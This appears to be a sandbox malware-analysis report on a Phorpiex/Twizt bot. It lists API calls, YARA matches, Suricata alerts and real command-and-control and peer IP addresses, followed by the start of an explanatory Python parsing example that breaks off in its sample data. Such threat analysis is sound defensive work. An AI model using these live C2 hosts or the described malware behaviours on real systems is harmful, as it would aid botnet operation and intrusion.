    Source: C:\Windows\sysludpvs.exe | Code function: 2_2_0040BFF0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,2_2_0040BFF0
    Source: C:\Windows\sysludpvs.exe | Code function: 7_2_0040BFF0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,7_2_0040BFF0

    Phishing

    Source: Yara match | File source: Process Memory Space: 230053364.exe PID: 8652, type: MEMORYSTR
    Source: Yara match | File source: Process Memory Space: sysludpvs.exe PID: 8672, type: MEMORYSTR
    Source: Yara match | File source: Process Memory Space: sysludpvs.exe PID: 9076, type: MEMORYSTR
    Source: a0RkmvhSaf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll
    Source: a0RkmvhSaf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: mscorlib.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.ni.pdbRSDS source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.Management.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: mscorlib.ni.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.Management.ni.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.ni.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe | Code function: 1_2_00406690 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406690
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe | Code function: 1_2_004067D0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_004067D0
    Source: C:\Windows\sysludpvs.exe | Code function: 2_2_00406690 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406690
    Source: C:\Windows\sysludpvs.exe | Code function: 2_2_004067D0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_004067D0
    Source: C:\Windows\sysludpvs.exe | Code function: 7_2_00406690 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406690
    Source: C:\Windows\sysludpvs.exe | Code function: 7_2_004067D0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,7_2_004067D0

    Networking

    Source: Network traffic | Suricata IDS: 2856563 - Severity 1 - ETPRO MALWARE Phorpiex Domain in DNS Lookup : 192.168.2.5:64335 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 5.76.154.73:40500
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 37.150.149.45:40500
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 92.244.232.104:40500
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 5.233.112.110:40500
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 213.206.60.173:40500
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 213.206.62.251:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49589 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 151.233.107.54:40500
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 37.151.27.190:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49710 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 93.188.86.253:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49608 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 90.156.165.93:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49610 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 113.86.140.229:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49596 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 95.56.224.166:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49712 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49635 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49616 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49603 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49624 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49632 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49630 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49637 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 2.181.203.195:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49600 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 89.35.132.112:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49654 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 147.30.105.215:40500
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 79.164.150.28:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49674 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 2.180.93.42:40500
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 146.70.53.161:40500
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 216.107.138.162:40500
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 78.39.225.185:40500
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 178.253.102.216:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49613 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49592 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 95.142.87.201:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49628 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49595 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 95.58.24.170:40500
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 93.180.124.3:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49605 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49625 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49601 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49687 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49594 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.5:49715 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49639 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49658 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49686 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49598 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49591 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49662 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49659 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49661 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49644 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49618 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 178.88.234.209:40500
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49641 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49692 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49633 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49611 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49622 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49607 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49649 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49693 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49695 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49697 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49673 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49647 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49650 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49689 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49642 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49652 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49656 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49690 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49684 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49645 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49682 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49676 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49615 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2853292 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin : 192.168.2.5:49709 -> 185.215.113.66:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49620 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49587 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49627 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.5:49715 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 91.202.233.141:80 -> 192.168.2.5:49715
    Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49671 -> 91.202.233.141:80
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe | Code function: 1_2_0040ABF0 htons,socket,connect,getsockname, www.update.microsoft.com | 1_2_0040ABF0
    Source: C:\Windows\sysludpvs.exe | Code function: 2_2_0040ABF0 htons,socket,connect,getsockname, www.update.microsoft.com | 2_2_0040ABF0
    Source: C:\Windows\sysludpvs.exe | Code function: 7_2_0040ABF0 htons,socket,connect,getsockname, www.update.microsoft.com | 7_2_0040ABF0
    Source: unknown | Network traffic detected: IP country count 18
    Source: global traffic | TCP traffic: 192.168.2.5:49713 -> 203.188.251.78:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49586 -> 92.47.79.250:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49593 -> 90.156.161.103:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49597 -> 31.171.184.200:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49599 -> 217.77.127.213:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49602 -> 190.74.239.163:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49604 -> 178.88.234.209:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49606 -> 5.239.149.199:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49609 -> 90.156.167.249:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49612 -> 82.200.234.162:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49614 -> 78.109.103.103:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49617 -> 89.33.234.8:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49619 -> 178.88.94.24:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49621 -> 81.2.6.166:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49623 -> 217.30.162.244:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49626 -> 5.239.203.3:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49629 -> 2.190.231.214:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49631 -> 178.90.38.234:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49634 -> 178.34.102.85:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49636 -> 90.156.164.120:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49638 -> 5.251.14.217:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49643 -> 188.17.107.147:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49646 -> 89.218.146.134:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49648 -> 154.251.113.98:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49651 -> 2.133.131.102:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49653 -> 212.154.221.106:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49655 -> 2.133.238.177:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49657 -> 2.190.155.52:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49660 -> 178.91.90.11:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49663 -> 178.253.102.221:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49672 -> 2.180.10.247:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49675 -> 109.74.70.126:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49680 -> 102.189.206.27:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49683 -> 95.142.87.201:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49685 -> 5.235.233.26:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49688 -> 89.249.62.94:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49691 -> 5.232.180.114:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49696 -> 213.206.61.228:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 92.244.232.104:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 37.150.149.45:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 5.76.154.73:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 213.206.61.226:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 5.233.112.110:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 2.177.44.200:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 37.151.27.190:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 79.164.150.28:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 213.206.60.173:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 213.206.62.251:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 151.233.107.54:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 93.188.86.253:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 217.30.162.37:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 113.86.140.229:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 146.70.53.161:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 89.236.216.14:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 213.230.99.34:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 147.30.105.215:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 90.156.165.93:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 2.181.203.195:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 216.107.138.162:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 95.56.224.166:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 90.156.163.111:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 82.200.169.222:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 89.218.186.142:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 90.156.166.108:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 178.253.102.216:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 94.183.208.151:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 213.206.62.230:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 95.58.24.170:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 151.232.174.105:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 80.191.192.168:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 89.35.132.112:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 178.129.39.66:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 82.204.215.94:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 2.180.93.42:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 78.39.225.185:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 213.109.253.244:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 93.180.124.3:40500
    Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 89.218.244.178:40500
    Source: global traffic | TCP traffic: 192.168.2.5:49579 -> 1.1.1.1:53
    Source: global traffic | TCP traffic: 192.168.2.5:58631 -> 1.1.1.1:53
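    The Suricata alert rows and the TCP/UDP rows above are the raw evidence an analyst works from, and they answer two different questions. The alerts name the HTTP C2 hosts (one Phorpiex.V signature fires against two hosts on port 80, a separate Twizt check-in signature against a third, and the Nemucod payload-download pair against one of the first two), while the un-signatured port-40500 rows show the bot fanning out to dozens of peers across 18 countries, with every UDP datagram leaving from the same local port 65203, which is a socket the sample bound itself rather than an ephemeral client port. The Python below is an added example and not part of the Joe Sandbox report: it parses a constructed subset of the rows above with one tolerant parser (the regexes match whether or not the "Source" cell is separated from the detail cell), lists the unique remote endpoints per signature ID, and flags the P2P fan-out generically. The analysis VM address 192.168.2.5 is taken from the report; the peer threshold, the well-known-port list and the field names are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed sample input: a subset of the "Source:" rows from the report
# above (the full report lists several dozen peers on port 40500).
SAMPLE_LINES = """\
Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49633 -> 45.93.20.18:80
Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49611 -> 91.202.233.141:80
Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49622 -> 45.93.20.18:80
Source: Network traffic | Suricata IDS: 2853292 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin : 192.168.2.5:49709 -> 185.215.113.66:80
Source: Network traffic | Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.5:49715 -> 91.202.233.141:80
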